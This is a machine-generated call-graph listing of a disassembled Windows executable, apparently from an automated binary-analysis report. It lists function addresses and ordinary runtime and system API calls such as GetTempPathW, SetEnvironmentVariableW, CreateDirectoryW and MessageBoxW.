16665->16666 16671 7ff73ae3867c 37 API calls 16666->16671 16672 7ff73ae3486d 16667->16672 16668->16664 16669 7ff73ae347dd 16668->16669 16670 7ff73ae3488c 16668->16670 16669->16663 16669->16664 16675 7ff73ae2aa3c __std_exception_copy 37 API calls 16670->16675 16673 7ff73ae348ed 16671->16673 16674 7ff73ae35994 16672->16674 16679 7ff73ae34875 16672->16679 16676 7ff73ae38870 20 API calls 16673->16676 16677 7ff73ae2aec4 _wfindfirst32i64 17 API calls 16674->16677 16675->16672 16687 7ff73ae34956 memcpy_s 16676->16687 16678 7ff73ae359a9 16677->16678 16680 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16679->16680 16681 7ff73ae2e911 16680->16681 16705 7ff73ae34164 16681->16705 16682 7ff73ae34cff memcpy_s 16683 7ff73ae3503f 16684 7ff73ae34280 37 API calls 16683->16684 16691 7ff73ae35757 16684->16691 16685 7ff73ae34feb 16685->16683 16688 7ff73ae359ac memcpy_s 37 API calls 16685->16688 16686 7ff73ae34997 memcpy_s 16699 7ff73ae352db memcpy_s 16686->16699 16700 7ff73ae34df3 memcpy_s 16686->16700 16687->16682 16687->16686 16689 7ff73ae254c4 memcpy_s 11 API calls 16687->16689 16688->16683 16690 7ff73ae34dd0 16689->16690 16692 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 16690->16692 16694 7ff73ae359ac memcpy_s 37 API calls 16691->16694 16704 7ff73ae357b2 16691->16704 16692->16686 16693 7ff73ae35938 16695 7ff73ae3867c 37 API calls 16693->16695 16694->16704 16695->16679 16696 7ff73ae254c4 11 API calls memcpy_s 16696->16700 16697 7ff73ae254c4 11 API calls memcpy_s 16697->16699 16698 7ff73ae2aea4 37 API calls _invalid_parameter_noinfo 16698->16700 16699->16683 16699->16685 16699->16697 16702 7ff73ae2aea4 37 API calls _invalid_parameter_noinfo 16699->16702 16700->16685 16700->16696 16700->16698 16701 7ff73ae34280 37 API calls 16701->16704 16702->16699 16703 7ff73ae359ac memcpy_s 37 API calls 16703->16704 16704->16693 16704->16701 16704->16703 16706 7ff73ae34183 16705->16706 16707 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16706->16707 16708 7ff73ae341ae memcpy_s 16706->16708 16707->16708 16708->16631 16710 7ff73ae2e798 memcpy_s 16709->16710 16711 7ff73ae24900 45 API calls 16710->16711 16712 7ff73ae2e852 memcpy_s 16710->16712 16711->16712 16712->16636 16714 7ff73ae2e4eb 16713->16714 16718 7ff73ae2e538 memcpy_s 16713->16718 16715 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16714->16715 16716 7ff73ae2e517 16715->16716 16716->16636 16717 7ff73ae2e5a3 16719 7ff73ae2aa3c __std_exception_copy 37 API calls 16717->16719 16718->16717 16720 7ff73ae24900 45 API calls 16718->16720 16723 7ff73ae2e5e5 memcpy_s 16719->16723 16720->16717 16721 7ff73ae2aec4 _wfindfirst32i64 17 API calls 16722 7ff73ae2e690 16721->16722 16723->16721 16725 7ff73ae20e81 16724->16725 16726 7ff73ae20e93 16724->16726 16727 7ff73ae254c4 memcpy_s 11 API calls 16725->16727 16729 7ff73ae20ea0 16726->16729 16732 7ff73ae20edd 16726->16732 16728 7ff73ae20e86 16727->16728 16730 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 16728->16730 16731 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16729->16731 16737 7ff73ae20e91 16730->16737 16731->16737 16733 7ff73ae20f86 16732->16733 16735 7ff73ae254c4 memcpy_s 11 API calls 16732->16735 16734 7ff73ae254c4 memcpy_s 11 API calls 16733->16734 16733->16737 16736 7ff73ae21030 16734->16736 16738 7ff73ae20f7b 16735->16738 16740 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 16736->16740 16737->16477 16739 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 16738->16739 16739->16733 16740->16737 16742 7ff73ae2493f 16741->16742 16743 7ff73ae2df91 16741->16743 16745 7ff73ae2dfe4 16742->16745 16743->16742 16744 7ff73ae33974 45 API calls 16743->16744 16744->16742 16746 7ff73ae2dffd 16745->16746 16748 7ff73ae2494f 16745->16748 16747 7ff73ae32cc0 45 API calls 16746->16747 16746->16748 16747->16748 16748->16477 16756 7ff73ae2536c EnterCriticalSection 16749->16756 16758 7ff73ae128ac 16757->16758 16759 7ff73ae24ac4 49 API calls 16758->16759 16760 7ff73ae128fd 16759->16760 16761 7ff73ae254c4 memcpy_s 11 API calls 16760->16761 16762 7ff73ae12902 16761->16762 16776 7ff73ae254e4 16762->16776 16765 7ff73ae11ef0 49 API calls 16766 7ff73ae12931 memcpy_s 16765->16766 16767 7ff73ae18ae0 57 API calls 16766->16767 16768 7ff73ae12966 16767->16768 16769 7ff73ae1296b 16768->16769 16770 7ff73ae129a3 MessageBoxA 16768->16770 16772 7ff73ae18ae0 57 API calls 16769->16772 16771 7ff73ae129bd 16770->16771 16774 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16771->16774 16773 7ff73ae12985 MessageBoxW 16772->16773 16773->16771 16775 7ff73ae129cd 16774->16775 16775->16165 16777 7ff73ae2b888 memcpy_s 11 API calls 16776->16777 16778 7ff73ae254fb 16777->16778 16779 7ff73ae12909 16778->16779 16780 7ff73ae2f158 memcpy_s 11 API calls 16778->16780 16783 7ff73ae2553b 16778->16783 16779->16765 16781 7ff73ae25530 16780->16781 16782 7ff73ae2af0c __free_lconv_num 11 API calls 16781->16782 16782->16783 16783->16779 16788 7ff73ae2f828 16783->16788 16786 7ff73ae2aec4 _wfindfirst32i64 17 API calls 16787 7ff73ae25580 16786->16787 16793 7ff73ae2f845 16788->16793 16789 7ff73ae2f84a 16790 7ff73ae25561 16789->16790 16791 7ff73ae254c4 memcpy_s 11 API calls 16789->16791 16790->16779 16790->16786 16792 7ff73ae2f854 16791->16792 16794 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 16792->16794 16793->16789 16793->16790 16795 7ff73ae2f894 16793->16795 16794->16790 16795->16790 16796 7ff73ae254c4 memcpy_s 11 API calls 16795->16796 16796->16792 16798 7ff73ae18c82 WideCharToMultiByte 16797->16798 16799 7ff73ae18c14 WideCharToMultiByte 16797->16799 16802 7ff73ae18caf 16798->16802 16803 7ff73ae13f25 16798->16803 16800 7ff73ae18c3e 16799->16800 16801 7ff73ae18c55 16799->16801 16804 7ff73ae129e0 57 API calls 16800->16804 16801->16798 16806 7ff73ae18c6b 16801->16806 16805 7ff73ae129e0 57 API calls 16802->16805 16803->16174 16803->16177 16804->16803 16805->16803 16807 7ff73ae129e0 57 API calls 16806->16807 16807->16803 16809 7ff73ae17bde 16808->16809 16810 7ff73ae2a9b3 16808->16810 16809->16192 16810->16809 16811 7ff73ae2aa3c __std_exception_copy 37 API calls 16810->16811 16812 7ff73ae2a9e0 16811->16812 16812->16809 16813 7ff73ae2aec4 _wfindfirst32i64 17 API calls 16812->16813 16814 7ff73ae2aa10 16813->16814 16816 7ff73ae13fd0 116 API calls 16815->16816 16817 7ff73ae11ad6 16816->16817 16818 7ff73ae11c84 16817->16818 16820 7ff73ae182b0 83 API calls 16817->16820 16819 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16818->16819 16821 7ff73ae11c98 16819->16821 16822 7ff73ae11b0e 16820->16822 16821->16202 16848 7ff73ae13e40 16821->16848 16846 7ff73ae11b3f 16822->16846 16854 7ff73ae20814 16822->16854 16824 7ff73ae2018c 74 API calls 16824->16818 16825 7ff73ae11b28 16826 7ff73ae11b2c 16825->16826 16827 7ff73ae11b44 16825->16827 16828 7ff73ae12890 59 API calls 16826->16828 16858 7ff73ae204dc 16827->16858 16828->16846 16831 7ff73ae11b77 16834 7ff73ae20814 73 API calls 16831->16834 16832 7ff73ae11b5f 16833 7ff73ae12890 59 API calls 16832->16833 16833->16846 16835 7ff73ae11bc4 16834->16835 16836 7ff73ae11bee 16835->16836 16837 7ff73ae11bd6 16835->16837 16839 7ff73ae204dc _fread_nolock 53 API calls 16836->16839 16838 7ff73ae12890 59 API calls 16837->16838 16838->16846 16840 7ff73ae11c03 16839->16840 16841 7ff73ae11c09 16840->16841 16842 7ff73ae11c1e 16840->16842 16843 7ff73ae12890 59 API calls 16841->16843 16861 7ff73ae20250 16842->16861 16843->16846 16846->16824 16847 7ff73ae12b30 59 API calls 16847->16846 16849 7ff73ae11ef0 49 API calls 16848->16849 16850 7ff73ae13e5d 16849->16850 16850->16212 16852 7ff73ae11ef0 49 API calls 16851->16852 16853 7ff73ae14080 16852->16853 16853->16202 16855 7ff73ae20844 16854->16855 16867 7ff73ae205a4 16855->16867 16857 7ff73ae2085d 16857->16825 16879 7ff73ae204fc 16858->16879 16862 7ff73ae20259 16861->16862 16863 7ff73ae11c32 16861->16863 16864 7ff73ae254c4 memcpy_s 11 API calls 16862->16864 16863->16846 16863->16847 16865 7ff73ae2025e 16864->16865 16866 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 16865->16866 16866->16863 16868 7ff73ae2060e 16867->16868 16869 7ff73ae205ce 16867->16869 16868->16869 16870 7ff73ae2061a 16868->16870 16871 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16869->16871 16878 7ff73ae2536c EnterCriticalSection 16870->16878 16873 7ff73ae205f5 16871->16873 16873->16857 16880 7ff73ae20526 16879->16880 16891 7ff73ae11b59 16879->16891 16881 7ff73ae20572 16880->16881 16882 7ff73ae20535 memcpy_s 16880->16882 16880->16891 16892 7ff73ae2536c EnterCriticalSection 16881->16892 16884 7ff73ae254c4 memcpy_s 11 API calls 16882->16884 16886 7ff73ae2054a 16884->16886 16888 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 16886->16888 16888->16891 16891->16831 16891->16832 16894 7ff73ae17966 16893->16894 16895 7ff73ae1798a 16894->16895 16896 7ff73ae179dd GetTempPathW 16894->16896 16897 7ff73ae17b60 61 API calls 16895->16897 16898 7ff73ae179f2 16896->16898 16899 7ff73ae17996 16897->16899 16932 7ff73ae12830 16898->16932 16956 7ff73ae17420 16899->16956 16905 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16907 7ff73ae1154f 16905->16907 16906 7ff73ae179bc __vcrt_freefls 16906->16896 16911 7ff73ae179ca 16906->16911 16907->16220 16907->16221 16909 7ff73ae17a0b __vcrt_freefls 16910 7ff73ae17ab6 16909->16910 16915 7ff73ae17a41 16909->16915 16936 7ff73ae28aa4 16909->16936 16939 7ff73ae18950 16909->16939 16913 7ff73ae18bf0 59 API calls 16910->16913 16912 7ff73ae12b30 59 API calls 16911->16912 16914 7ff73ae179d6 16912->16914 16916 7ff73ae17ac7 __vcrt_freefls 16913->16916 16928 7ff73ae17a7a __vcrt_freefls 16914->16928 16917 7ff73ae18ae0 57 API calls 16915->16917 16915->16928 16918 7ff73ae18ae0 57 API calls 16916->16918 16916->16928 16919 7ff73ae17a57 16917->16919 16920 7ff73ae17ae5 16918->16920 16921 7ff73ae17a99 SetEnvironmentVariableW 16919->16921 16922 7ff73ae17a5c 16919->16922 16923 7ff73ae17aea 16920->16923 16924 7ff73ae17b1d SetEnvironmentVariableW 16920->16924 16921->16928 16925 7ff73ae18ae0 57 API calls 16922->16925 16927 7ff73ae18ae0 57 API calls 16923->16927 16924->16928 16926 7ff73ae17a6c 16925->16926 16929 7ff73ae27dec 38 API calls 16926->16929 16930 7ff73ae17afa 16927->16930 16928->16905 16929->16928 16931 7ff73ae27dec 38 API calls 16930->16931 16931->16928 16933 7ff73ae12855 16932->16933 16990 7ff73ae24d18 16933->16990 17181 7ff73ae286d0 16936->17181 16940 7ff73ae1bc60 16939->16940 16941 7ff73ae18960 GetCurrentProcess OpenProcessToken 16940->16941 16942 7ff73ae189ab GetTokenInformation 16941->16942 16943 7ff73ae18a21 __vcrt_freefls 16941->16943 16944 7ff73ae189d8 16942->16944 16945 7ff73ae189cd GetLastError 16942->16945 16946 7ff73ae18a3a 16943->16946 16947 7ff73ae18a34 CloseHandle 16943->16947 16944->16943 16949 7ff73ae189ee GetTokenInformation 16944->16949 16945->16943 16945->16944 17307 7ff73ae18650 16946->17307 16947->16946 16949->16943 16950 7ff73ae18a14 ConvertSidToStringSidW 16949->16950 16950->16943 16952 7ff73ae18aae 16954 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16952->16954 16953 7ff73ae18a96 CreateDirectoryW 16953->16952 16957 7ff73ae1742c 16956->16957 16958 7ff73ae18ae0 57 API calls 16957->16958 16959 7ff73ae1744e 16958->16959 16960 7ff73ae17469 ExpandEnvironmentStringsW 16959->16960 16961 7ff73ae17456 16959->16961 16962 7ff73ae1748f __vcrt_freefls 16960->16962 16963 7ff73ae12b30 59 API calls 16961->16963 16964 7ff73ae17493 16962->16964 16965 7ff73ae174a6 16962->16965 16969 7ff73ae17462 16963->16969 16966 7ff73ae12b30 59 API calls 16964->16966 16970 7ff73ae174c0 16965->16970 16971 7ff73ae174b4 16965->16971 16966->16969 16967 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16968 7ff73ae17588 16967->16968 16968->16928 16980 7ff73ae27dec 16968->16980 16969->16967 17318 7ff73ae26328 16970->17318 17311 7ff73ae279a4 16971->17311 16974 7ff73ae174be 16975 7ff73ae174da 16974->16975 16978 7ff73ae174ed memcpy_s 16974->16978 16976 7ff73ae12b30 59 API calls 16975->16976 16976->16969 16977 7ff73ae17562 CreateDirectoryW 16977->16969 16978->16977 16979 7ff73ae1753c CreateDirectoryW 16978->16979 16979->16978 16981 7ff73ae27df9 16980->16981 16982 7ff73ae27e0c 16980->16982 16983 7ff73ae254c4 memcpy_s 11 API calls 16981->16983 17419 7ff73ae27a70 16982->17419 16985 7ff73ae27dfe 16983->16985 16987 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 16985->16987 16988 7ff73ae27e0a 16987->16988 16988->16906 16993 7ff73ae24d72 16990->16993 16991 7ff73ae24d97 16992 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16991->16992 17007 7ff73ae24dc1 16992->17007 16993->16991 16994 7ff73ae24dd3 16993->16994 17008 7ff73ae230d0 16994->17008 16997 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16999 7ff73ae12874 16997->16999 16998 7ff73ae2af0c __free_lconv_num 11 API calls 16998->17007 16999->16909 17000 7ff73ae24eb4 17000->16998 17001 7ff73ae24eda 17001->17000 17003 7ff73ae24ee4 17001->17003 17002 7ff73ae24e89 17004 7ff73ae2af0c __free_lconv_num 11 API calls 17002->17004 17006 7ff73ae2af0c __free_lconv_num 11 API calls 17003->17006 17004->17007 17005 7ff73ae24e80 17005->17000 17005->17002 17006->17007 17007->16997 17009 7ff73ae2310e 17008->17009 17010 7ff73ae230fe 17008->17010 17011 7ff73ae23117 17009->17011 17016 7ff73ae23145 17009->17016 17014 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 17010->17014 17012 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 17011->17012 17013 7ff73ae2313d 17012->17013 17013->17000 17013->17001 17013->17002 17013->17005 17014->17013 17016->17010 17016->17013 17019 7ff73ae23ae4 17016->17019 17052 7ff73ae23530 17016->17052 17089 7ff73ae22cc0 17016->17089 17020 7ff73ae23b97 17019->17020 17021 7ff73ae23b26 17019->17021 17024 7ff73ae23b9c 17020->17024 17025 7ff73ae23bf0 17020->17025 17022 7ff73ae23b2c 17021->17022 17023 7ff73ae23bc1 17021->17023 17026 7ff73ae23b60 17022->17026 17027 7ff73ae23b31 17022->17027 17108 7ff73ae21e94 17023->17108 17028 7ff73ae23b9e 17024->17028 17029 7ff73ae23bd1 17024->17029 17031 7ff73ae23c07 17025->17031 17034 7ff73ae23bfa 17025->17034 17038 7ff73ae23bff 17025->17038 17032 7ff73ae23b37 17026->17032 17026->17038 17027->17031 17027->17032 17033 7ff73ae23b40 17028->17033 17041 7ff73ae23bad 17028->17041 17115 7ff73ae21a84 17029->17115 17122 7ff73ae247ec 17031->17122 17032->17033 17039 7ff73ae23b72 17032->17039 17047 7ff73ae23b5b 17032->17047 17051 7ff73ae23c30 17033->17051 17092 7ff73ae24298 17033->17092 17034->17023 17034->17038 17038->17051 17126 7ff73ae222a4 17038->17126 17039->17051 17102 7ff73ae245d4 17039->17102 17041->17023 17043 7ff73ae23bb2 17041->17043 17045 7ff73ae24698 37 API calls 17043->17045 17043->17051 17044 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 17046 7ff73ae23f2a 17044->17046 17045->17047 17046->17016 17048 7ff73ae24900 45 API calls 17047->17048 17050 7ff73ae23e1c 17047->17050 17047->17051 17048->17050 17050->17051 17133 7ff73ae2efc8 17050->17133 17051->17044 17053 7ff73ae2353e 17052->17053 17054 7ff73ae23554 17052->17054 17055 7ff73ae23b97 17053->17055 17056 7ff73ae23b26 17053->17056 17058 7ff73ae23594 17053->17058 17057 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 17054->17057 17054->17058 17061 7ff73ae23b9c 17055->17061 17062 7ff73ae23bf0 17055->17062 17059 7ff73ae23b2c 17056->17059 17060 7ff73ae23bc1 17056->17060 17057->17058 17058->17016 17063 7ff73ae23b60 17059->17063 17064 7ff73ae23b31 17059->17064 17067 7ff73ae21e94 38 API calls 17060->17067 17065 7ff73ae23b9e 17061->17065 17066 7ff73ae23bd1 17061->17066 17068 7ff73ae23c07 17062->17068 17071 7ff73ae23bfa 17062->17071 17075 7ff73ae23bff 17062->17075 17069 7ff73ae23b37 17063->17069 17063->17075 17064->17068 17064->17069 17070 7ff73ae23b40 17065->17070 17078 7ff73ae23bad 17065->17078 17073 7ff73ae21a84 38 API calls 17066->17073 17086 7ff73ae23b5b 17067->17086 17072 7ff73ae247ec 45 API calls 17068->17072 17069->17070 17076 7ff73ae23b72 17069->17076 17069->17086 17074 7ff73ae24298 47 API calls 17070->17074 17088 7ff73ae23c30 17070->17088 17071->17060 17071->17075 17072->17086 17073->17086 17074->17086 17077 7ff73ae222a4 38 API calls 17075->17077 17075->17088 17079 7ff73ae245d4 46 API calls 17076->17079 17076->17088 17077->17086 17078->17060 17080 7ff73ae23bb2 17078->17080 17079->17086 17082 7ff73ae24698 37 API calls 17080->17082 17080->17088 17081 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 17083 7ff73ae23f2a 17081->17083 17082->17086 17083->17016 17084 7ff73ae23e1c 17087 7ff73ae2efc8 46 API calls 17084->17087 17084->17088 17085 7ff73ae24900 45 API calls 17085->17084 17086->17084 17086->17085 17086->17088 17087->17084 17088->17081 17164 7ff73ae21108 17089->17164 17093 7ff73ae242be 17092->17093 17094 7ff73ae20cc0 12 API calls 17093->17094 17095 7ff73ae2430e 17094->17095 17096 7ff73ae2eb30 46 API calls 17095->17096 17097 7ff73ae243e1 17096->17097 17098 7ff73ae24900 45 API calls 17097->17098 17099 7ff73ae24403 17097->17099 17098->17099 17100 7ff73ae24900 45 API calls 17099->17100 17101 7ff73ae24491 17099->17101 17100->17101 17101->17047 17103 7ff73ae24609 17102->17103 17104 7ff73ae24627 17103->17104 17105 7ff73ae2464e 17103->17105 17106 7ff73ae24900 45 API calls 17103->17106 17107 7ff73ae2efc8 46 API calls 17104->17107 17105->17047 17106->17104 17107->17105 17109 7ff73ae21ec7 17108->17109 17110 7ff73ae21ef6 17109->17110 17112 7ff73ae21fb3 17109->17112 17114 7ff73ae21f33 17110->17114 17145 7ff73ae20d68 17110->17145 17113 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 17112->17113 17113->17114 17114->17047 17116 7ff73ae21ab7 17115->17116 17117 7ff73ae21ae6 17116->17117 17120 7ff73ae21ba3 17116->17120 17118 7ff73ae21b23 17117->17118 17119 7ff73ae20d68 12 API calls 17117->17119 17118->17047 17119->17118 17121 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 17120->17121 17121->17118 17123 7ff73ae2482f 17122->17123 17125 7ff73ae24833 __crtLCMapStringW 17123->17125 17153 7ff73ae24888 17123->17153 17125->17047 17128 7ff73ae222d7 17126->17128 17127 7ff73ae22306 17129 7ff73ae20d68 12 API calls 17127->17129 17132 7ff73ae22343 17127->17132 17128->17127 17130 7ff73ae223c3 17128->17130 17129->17132 17131 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 17130->17131 17131->17132 17132->17047 17135 7ff73ae2eff9 17133->17135 17143 7ff73ae2f007 17133->17143 17134 7ff73ae2f027 17136 7ff73ae2f038 17134->17136 17137 7ff73ae2f05f 17134->17137 17135->17134 17138 7ff73ae24900 45 API calls 17135->17138 17135->17143 17157 7ff73ae30a80 17136->17157 17140 7ff73ae2f089 17137->17140 17141 7ff73ae2f0ea 17137->17141 17137->17143 17138->17134 17140->17143 17144 7ff73ae2fc00 _fread_nolock MultiByteToWideChar 17140->17144 17142 7ff73ae2fc00 _fread_nolock MultiByteToWideChar 17141->17142 17142->17143 17143->17050 17144->17143 17146 7ff73ae20d9f 17145->17146 17152 7ff73ae20d8e 17145->17152 17147 7ff73ae2dbbc _fread_nolock 12 API calls 17146->17147 17146->17152 17148 7ff73ae20dd0 17147->17148 17149 7ff73ae2af0c __free_lconv_num 11 API calls 17148->17149 17151 7ff73ae20de4 17148->17151 17149->17151 17150 7ff73ae2af0c __free_lconv_num 11 API calls 17150->17152 17151->17150 17152->17114 17154 7ff73ae248a6 17153->17154 17156 7ff73ae248ae 17153->17156 17155 7ff73ae24900 45 API calls 17154->17155 17155->17156 17156->17125 17160 7ff73ae376e0 17157->17160 17165 7ff73ae2113d 17164->17165 17166 7ff73ae2114f 17164->17166 17167 7ff73ae254c4 memcpy_s 11 API calls 17165->17167 17168 7ff73ae2115d 17166->17168 17173 7ff73ae21199 17166->17173 17169 7ff73ae21142 17167->17169 17170 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 17168->17170 17171 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 17169->17171 17176 7ff73ae2114d 17170->17176 17171->17176 17172 7ff73ae21515 17174 7ff73ae254c4 memcpy_s 11 API calls 17172->17174 17172->17176 17173->17172 17175 7ff73ae254c4 memcpy_s 11 API calls 17173->17175 17177 7ff73ae217a9 17174->17177 17178 7ff73ae2150a 17175->17178 17176->17016 17180 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 17177->17180 17179 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 17178->17179 17179->17172 17180->17176 17222 7ff73ae31bc8 17181->17222 17281 7ff73ae31940 17222->17281 17302 7ff73ae30cb8 EnterCriticalSection 17281->17302 17308 7ff73ae18675 17307->17308 17309 7ff73ae24d18 48 API calls 17308->17309 17310 7ff73ae18698 LocalFree ConvertStringSecurityDescriptorToSecurityDescriptorW 17309->17310 17310->16952 17310->16953 17312 7ff73ae279c2 17311->17312 17315 7ff73ae279f5 17311->17315 17312->17315 17330 7ff73ae30e54 17312->17330 17315->16974 17316 7ff73ae2aec4 _wfindfirst32i64 17 API calls 17317 7ff73ae27a25 17316->17317 17319 7ff73ae263b2 17318->17319 17320 7ff73ae26344 17318->17320 17364 7ff73ae304a0 17319->17364 17320->17319 17322 7ff73ae26349 17320->17322 17323 7ff73ae2637e 17322->17323 17324 7ff73ae26361 17322->17324 17347 7ff73ae2616c GetFullPathNameW 17323->17347 17339 7ff73ae260f8 GetFullPathNameW 17324->17339 17329 7ff73ae26376 __vcrt_freefls 17329->16974 17331 7ff73ae30e61 17330->17331 17333 7ff73ae30e6b 17330->17333 17331->17333 17337 7ff73ae30e87 17331->17337 17332 7ff73ae254c4 memcpy_s 11 API calls 17334 7ff73ae30e73 17332->17334 17333->17332 17335 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 17334->17335 17336 7ff73ae279f1 17335->17336 17336->17315 17336->17316 17337->17336 17338 7ff73ae254c4 memcpy_s 11 API calls 17337->17338 17338->17334 17340 7ff73ae2611e GetLastError 17339->17340 17344 7ff73ae26134 17339->17344 17341 7ff73ae25438 _fread_nolock 11 API calls 17340->17341 17342 7ff73ae2612b 17341->17342 17346 7ff73ae254c4 memcpy_s 11 API calls 17342->17346 17343 7ff73ae26130 17343->17329 17344->17343 17345 7ff73ae254c4 memcpy_s 11 API calls 17344->17345 17345->17343 17346->17343 17348 7ff73ae2619f GetLastError 17347->17348 17349 7ff73ae261b5 __vcrt_freefls 17347->17349 17350 7ff73ae25438 _fread_nolock 11 API calls 17348->17350 17353 7ff73ae2620f GetFullPathNameW 17349->17353 17354 7ff73ae261b1 17349->17354 17351 7ff73ae261ac 17350->17351 17352 7ff73ae254c4 memcpy_s 11 API calls 17351->17352 17352->17354 17353->17348 17353->17354 17355 7ff73ae26244 17354->17355 17358 7ff73ae262b8 memcpy_s 17355->17358 17359 7ff73ae2626d memcpy_s 17355->17359 17356 7ff73ae262a1 17357 7ff73ae254c4 memcpy_s 11 API calls 17356->17357 17363 7ff73ae262a6 17357->17363 17358->17329 17359->17356 17359->17358 17360 7ff73ae262da 17359->17360 17360->17358 17362 7ff73ae254c4 memcpy_s 11 API calls 17360->17362 17362->17363 17367 7ff73ae302b0 17364->17367 17368 7ff73ae302db 17367->17368 17369 7ff73ae302f2 17367->17369 17372 7ff73ae254c4 memcpy_s 11 API calls 17368->17372 17370 7ff73ae30317 17369->17370 17371 7ff73ae302f6 17369->17371 17405 7ff73ae2f918 17370->17405 17393 7ff73ae3041c 17371->17393 17375 7ff73ae302e0 17372->17375 17378 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 17375->17378 17377 7ff73ae3031c 17392 7ff73ae302eb __vcrt_freefls 17378->17392 17379 7ff73ae302ff 17384 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 17387 7ff73ae30411 17384->17387 17387->17329 17392->17384 17394 7ff73ae30466 17393->17394 17395 7ff73ae30436 17393->17395 17396 7ff73ae30451 17394->17396 17397 7ff73ae30471 GetDriveTypeW 17394->17397 17398 7ff73ae254a4 _fread_nolock 11 API calls 17395->17398 17400 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 17396->17400 17397->17396 17399 7ff73ae3043b 17398->17399 17401 7ff73ae254c4 memcpy_s 11 API calls 17399->17401 17402 7ff73ae302fb 17400->17402 17403 7ff73ae30446 17401->17403 17402->17377 17402->17379 17406 7ff73ae1d0e0 memcpy_s 17405->17406 17407 7ff73ae2f94e GetCurrentDirectoryW 17406->17407 17408 7ff73ae2f98c 17407->17408 17409 7ff73ae2f965 17407->17409 17410 7ff73ae2f158 memcpy_s 11 API calls 17408->17410 17411 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 17409->17411 17412 7ff73ae2f99b 17410->17412 17413 7ff73ae2f9f9 17411->17413 17414 7ff73ae2f9a5 GetCurrentDirectoryW 17412->17414 17415 7ff73ae2f9b4 17412->17415 17413->17377 17414->17415 17426 7ff73ae30cb8 EnterCriticalSection 17419->17426 17428 7ff73ae1173e 17427->17428 17429 7ff73ae11726 17427->17429 17431 7ff73ae11768 17428->17431 17432 7ff73ae11744 17428->17432 17430 7ff73ae12b30 59 API calls 17429->17430 17434 7ff73ae11732 17430->17434 17520 7ff73ae17c10 17431->17520 17557 7ff73ae112b0 17432->17557 17434->16247 17438 7ff73ae1175f 17438->16247 17439 7ff73ae117b9 17443 7ff73ae13fd0 116 API calls 17439->17443 17440 7ff73ae1178d 17442 7ff73ae12890 59 API calls 17440->17442 17441 7ff73ae12b30 59 API calls 17441->17438 17444 7ff73ae117a3 17442->17444 17445 7ff73ae117ce 17443->17445 17444->16247 17446 7ff73ae117ee 17445->17446 17447 7ff73ae117d6 17445->17447 17448 7ff73ae20814 73 API calls 17446->17448 17449 7ff73ae12b30 59 API calls 17447->17449 17450 7ff73ae117ff 17448->17450 17451 7ff73ae117e5 17449->17451 17452 7ff73ae11823 17450->17452 17453 7ff73ae11803 17450->17453 17455 7ff73ae2018c 74 API calls 17451->17455 17456 7ff73ae11829 17452->17456 17457 7ff73ae11841 17452->17457 17454 7ff73ae12890 59 API calls 17453->17454 17458 7ff73ae11937 17455->17458 17458->16247 17470 7ff73ae12d86 17469->17470 17471 7ff73ae11ef0 49 API calls 17470->17471 17472 7ff73ae12db9 17471->17472 17473 7ff73ae13e40 49 API calls 17472->17473 17499 7ff73ae130ea 17472->17499 17474 7ff73ae12e27 17473->17474 17475 7ff73ae13e40 49 API calls 17474->17475 17476 7ff73ae12e38 17475->17476 17477 7ff73ae12e59 17476->17477 17478 7ff73ae12e95 17476->17478 17692 7ff73ae131b0 17477->17692 17480 7ff73ae131b0 75 API calls 17478->17480 17481 7ff73ae12e93 17480->17481 17482 7ff73ae12ed4 17481->17482 17483 7ff73ae12f16 17481->17483 17700 7ff73ae175a0 17482->17700 17485 7ff73ae131b0 75 API calls 17483->17485 17487 7ff73ae12f40 17485->17487 17491 7ff73ae131b0 75 API calls 17487->17491 17496 7ff73ae12fdc 17487->17496 17489 7ff73ae13171 17493 7ff73ae12f72 17491->17493 17493->17496 17500 7ff73ae131b0 75 API calls 17493->17500 17494 7ff73ae11eb0 59 API calls 17497 7ff73ae1302f 17494->17497 17496->17494 17513 7ff73ae130ef 17496->17513 17497->17499 17503 7ff73ae11ef0 49 API calls 17497->17503 17502 7ff73ae12fa0 17500->17502 17502->17496 17508 7ff73ae12b30 59 API calls 17512 7ff73ae13148 17508->17512 17512->17489 17512->17508 17515 7ff73ae11710 144 API calls 17512->17515 17513->17512 17737 7ff73ae25070 17513->17737 17515->17512 17521 7ff73ae17c20 17520->17521 17522 7ff73ae11ef0 49 API calls 17521->17522 17523 7ff73ae17c61 17522->17523 17524 7ff73ae17ce1 17523->17524 17600 7ff73ae13f60 17523->17600 17526 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 17524->17526 17528 7ff73ae11785 17526->17528 17528->17439 17528->17440 17529 7ff73ae17d1b 17606 7ff73ae177c0 